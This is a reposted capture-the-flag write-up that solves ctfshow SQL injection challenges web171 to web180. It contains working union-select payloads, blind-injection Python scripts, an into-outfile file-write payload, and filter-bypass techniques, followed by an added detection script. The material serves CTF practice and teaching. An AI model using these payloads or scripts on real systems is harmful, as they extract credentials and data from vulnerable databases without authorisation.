
Web171~180 of ctfshow - SQL injection (1)

2022-06-10 05:26:00 Golden silk

Catalog

web171

Summary:

web172

web173

web174

Method 1: String conversion bypass

Method 2: Blind injection

web175

Method 1: Time-based blind injection

Method 2: Writing a file

Summary:

web176

web177

Summary:

web178

Summary:

web179

web180

Summary:


web171

Use order by to determine the column count; it is 3.

Then dump all the table names of the current database with a union injection

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

According to the SQL statement shown in the challenge, the flag is in the password field, in the row whose username is flag, so build a payload that reads the flag directly

-1' union select 1,2,password from ctfshow_user where username = 'flag' --+

Summary:

Sometimes the # comment marker cannot be used and --+ can replace it. The result of the union query is not constrained by the preceding where clause, so a condition such as username != 'flag' does not block the union injection

web172

The next challenge is similar, except that the column count here is 2 and there is an extra constraint

It checks whether the returned data contains flag; if it does, nothing is echoed

First list the tables

-1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

Clearly the flag is not in the first table, so build the payload

-1' union select 2,password from ctfshow_user2 where username = 'flag' --+

web173 

The column count is still 3; unlike the first challenge, there is a filter function

It checks whether the echo contains flag and fails the query if so, but it appears to have no effect

-1' union select 1,2,password from ctfshow_user3 where username = 'flag' --+

web174

The column count is 2

According to the hint, flag and the digits 0-9 are filtered here, so querying id=2 or id=3 gives no echo. There are two ways to solve this: blind injection, or bypassing the check

Method 1: String conversion bypass

Because the flag must contain digits, and may also contain the string flag, we can base64-encode the echoed value and then replace the digits, which bypasses the output check. The functions used are to_base64 and replace

Build the payload

-1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username = 'flag' --+

Copy the encoded password into the decoding script to get the flag

import base64

# Paste the value returned by the payload above (placeholder left empty here)
flag64 = " "

# Undo the digit substitution, then base64-decode
flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

Method 2: Blind injection

We first need to know the query endpoint and the difference between a correct page and an error page before running a Python script. First capture the id query request with Burp Suite

Assemble the query endpoint URL

ca140cdb-03af-4111-aea3-508eb34a10a1.challenge.ctf.show/api/v4.php?id=1&page=1&limit=10

Visit it directly

Boolean-based blind injection; try the error page

ca140cdb-03af-4111-aea3-508eb34a10a1.challenge.ctf.show/api/v4.php?id=1' and 0--+

The string admin is the key to telling a true response from a false one. Using that, write a Python script (limited ability; the code is a bit rough and takes a while to run)

import requests

url = "http://1641eab8-d9ad-45ac-b1f6-088311ddb9e0.challenge.ctf.show/api/v4.php"
flag = ""

# Boolean-based blind injection: the response contains "admin" only when the
# injected condition is true. Recover the password one character at a time.
for i in range(1,100):
    c = 32
    while c > 31:
        payload_1 = "?id=1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username = 'flag'),%d,1)) > %d -- -"%(i,c)
        payload_2 = "?id=1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username = 'flag'),%d,1)) = %d -- -"%(i,c)
        res_1 = requests.get(url=url+payload_1).text
        res_2 = requests.get(url=url+payload_2).text
        if "admin" in res_1:
            c = c + 10      # character is larger than c: jump up
        elif "admin" in res_2:
            flag += chr(c)  # exact match: record it
            print(flag)
            print(c)
            break
        else:
            c = c - 1       # overshot: step down one
    else:
        break               # no character at this position: end of string

web175

In a regular expression, \xnn stands for the character whose ASCII code is hex nn. This challenge filters out ASCII characters 0 to 127, so the flag can no longer be read from the echo, but time-based blind injection and writing a file can still retrieve it

Method 1: Time-based blind injection

Get the endpoint URL and write a time-based blind injection Python script

#ctfshow web175
import requests


url = "http://84e961fe-66cb-4aeb-b84e-bc8d9fc931bd.challenge.ctf.show/api/v5.php"
flag = ""
i = 0

# Time-based blind injection: the server sleeps for 2 s when the comparison
# is true, so a request timeout means the character is greater than mid.
while True:
    i = i + 1
    left = 32
    right = 127
    while left < right:          # binary search the ASCII value at position i
        mid = (left + right) // 2
        payload = f"?id=1' and if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),{i},1))>{mid},sleep(2),0) -- -"
        try:
            requests.get(url = url + payload, timeout = 0.6)
            right = mid          # answered quickly: character <= mid
        except Exception:
            left = mid + 1       # timed out: character > mid
    if left != 32:
        flag += chr(left)
        print(flag)
    else:
        break                    # empty position: end of string

Method 2: Writing a file

Writing a file requires knowing the web root of the site, which is usually /var/www/html/. It also only works if the database account holds the FILE privilege and secure_file_priv allows writing to that path

Build the payload

0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

Then visit 1.txt to get the flag

Summary:

When the output is restricted, the result can be written to a file with into outfile

web176

Use order by to determine that the column count is 3, then use a union query

The union query turns out to be filtered: select is removed. Bypass it with mixed case

First look at the table names of the current database

0' union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+

Then, as above, dump the flag directly

0' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

web177

After testing, this is the same as above except that the space is filtered, and the comment marker -- is filtered as well. Use /**/ or %0a (newline) to bypass the space filter and %23 (#) to bypass the comment filter, then read the flag

'/**/Union/**/Select/**/1,2,group_concat(password)/**/from/**/ctfshow_user/**/where/**/username='flag'%23

Summary:

This kind of challenge generally cannot be fuzzed automatically, because an SQL syntax error gives the same echo as a filtered keyword. Test one thing at a time, or use a tool to generate a fuzz list that is syntactically correct

web178

Compared with the previous challenge, the /**/ comment is also filtered, but newline (%0a), parentheses, %09, %0c, %0d and %0b can replace it, so likewise

'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

Summary:

When spaces are filtered, /**/, %09, %0a, %0b, %0c, %0d and wrapping terms in parentheses can be used instead

web179 

Many more symbols are filtered here, but %0c still works, so continue as in the previous challenge

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

web180

%23 is filtered too. Instead of commenting out the rest of the statement, close the trailing quote with '1'='

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'or'1'='

Summary:

There are three ways to neutralize the tail of the statement: --, #, and closing the quote
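As an added defender-side example (not part of the original write-up), the following Python normalizer shows why the literal-keyword filters in web176 to web180 miss these payloads: after URL-decoding and collapsing comment and control-character whitespace, the mixed-case, /**/, %0c and quote-closed variants all reduce to the same union select sequence. The sample request lines are constructed for this example and modelled on the payloads above.

```python
import re
from urllib.parse import unquote

# Whitespace substitutes the write-up shows the filters letting through:
# inline comments and the %09 %0a %0b %0c %0d control characters.
WS_SUBSTITUTES = re.compile(r"/\*.*?\*/|[\t\n\x0b\x0c\r]+")
# Keyword sequence that a literal, case-sensitive "union select" check misses.
UNION_SELECT = re.compile(r"\bunion\s+select\b")
# Quote-closing tail as used in web180 instead of a comment marker.
QUOTE_CLOSER = re.compile(r"'\s*or\s*'[^']*'\s*=\s*'?$")


def normalize(query: str) -> str:
    """URL-decode, collapse comment/control-char whitespace, lowercase."""
    decoded = unquote(unquote(query))  # second pass handles double encoding
    decoded = WS_SUBSTITUTES.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify(query: str) -> list[str]:
    """Return the names of the patterns the normalized query matches."""
    norm = normalize(query)
    hits = []
    if UNION_SELECT.search(norm):
        hits.append("union-select")
    if QUOTE_CLOSER.search(norm):
        hits.append("quote-closer")
    if re.search(r"\binto\s+outfile\b", norm):
        hits.append("into-outfile")
    return hits


# Constructed sample request lines (not real traffic), one per bypass style.
SAMPLE_REQUESTS = [
    "id=1",                                                          # benign
    "id=0'%20union%20Select%201,2,3%20--+",                          # mixed case (web176)
    "id='/**/Union/**/Select/**/1,2,3%23",                           # comment whitespace (web177)
    "id='%0cUnion%0cSelect%0c1,2,3%23",                              # form-feed whitespace (web179)
    "id='%0cUnion%0cSelect%0c1%0cfrom%0ct%0cwhere%0cu='x'or'1'='",   # quote closer (web180)
    "id=0'%20union%20select%201,p%20into%20outfile%20'/tmp/x'--+",   # file write (web175)
]


def scan(lines=SAMPLE_REQUESTS) -> dict[str, list[str]]:
    """Classify every request line; an empty list means nothing matched."""
    return {line: classify(line) for line in lines}


if __name__ == "__main__":
    for line, hits in scan().items():
        print(f"{','.join(hits) or 'clean':<26} {line}")
```

Only the first sample line comes back clean; every bypass variant is reduced to the same keyword sequence, which is the check a blocklist that looks for a literal space-separated "union select" never gets to perform.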

Original site

Copyright notice
This article was written by [Golden silk]; please include the original link when reposting, thanks
https://yzsam.com/2022/160/202206091050544816.html